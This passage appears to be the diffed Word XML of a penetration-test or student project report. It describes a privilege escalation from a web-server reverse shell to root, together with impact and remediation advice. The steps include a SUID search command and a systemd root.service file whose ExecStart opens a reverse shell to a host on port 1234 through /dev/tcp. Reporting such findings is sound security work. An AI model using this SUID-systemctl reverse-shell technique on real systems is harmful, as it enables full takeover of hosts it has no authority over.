+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After getting reverse shell on the web server we moved forward to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>get  root</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> access and we successfully got it </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:t>IMPACT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>An attacker can exploit this vulnerability to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Full read/write access to sensitive databases and backups.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Tampering with logs and evidence → hinder detection/forensics.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Service shutdowns, destructive actions, or persistent backdoors.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RECOMMENDATIONS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>regularly scan for unexpected SUID/SGID files and remove or secure them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>apply vendor patches and OS updates promptly (prioritize privilege escalation patches).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">network segmentation, separate management networks, limit lateral movement. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Steps to Reproduce</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> searched for all </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>suid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> files using </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A483D64" wp14:editId="0A9F3467">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>952500</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>53975</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2514600" cy="285750"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1701737172" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2514600" cy="285750"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>find / -perm -u=s -type f 2&gt;/dev/null</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="1A483D64" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:75pt;margin-top:4.25pt;width:198pt;height:22.5pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>find / -perm -u=s -type f 2&gt;/dev/null</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we identified </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>systemctl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>we created the root. service file on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> our</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (local </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>host )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>below</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CA2E7BA" wp14:editId="252D8EB8">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1487805</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>249555</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2360930" cy="3143250"/>
+                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1642874469" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2360930" cy="3143250"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t>[Unit]</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>Description=root</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p/>
+                          <w:p>
+                            <w:r>
+                              <w:t>[Service]</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>Type=simple</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>User=root</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ExecStart</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>=/bin/bash -c "bash -</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>i</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>tcp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>/192.168.142.114/1234 0&gt;&amp;1"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:r>
+                              <w:t>[Install]</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>WantedBy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>=multi-</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:proofErr w:type="gramStart"/>
+                            <w:r>
+                              <w:t>user.target</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:proofErr w:type="gramEnd"/>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>40000</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="2CA2E7BA" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:117.15pt;margin-top:19.65pt;width:185.9pt;height:247.5pt;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:400;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:400;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t>[Unit]</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>Description=root</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p/>
+                    <w:p>
+                      <w:r>
+                        <w:t>[Service]</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>Type=simple</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>User=root</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ExecStart</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>=/bin/bash -c "bash -</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>i</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>tcp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>/192.168.142.114/1234 0&gt;&amp;1"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:r>
+                        <w:t>[Install]</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>WantedBy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>=multi-</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:t>user.target</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:proofErr w:type="gramEnd"/>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DDAE14B" wp14:editId="4966508C">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-152400</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>343535</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5819775" cy="295275"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="881481261" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5819775" cy="295275"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:hyperlink r:id="rId36" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="Hyperlink"/>
+                                </w:rPr>
+                                <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/priv-esc/root.service</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="6DDAE14B" id="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:-12pt;margin-top:27.05pt;width:458.25pt;height:23.25pt;z-index:251689984;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:hyperlink r:id="rId37" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="Hyperlink"/>
+                          </w:rPr>
+                          <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/priv-esc/root.service</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- or you can check the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>root.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
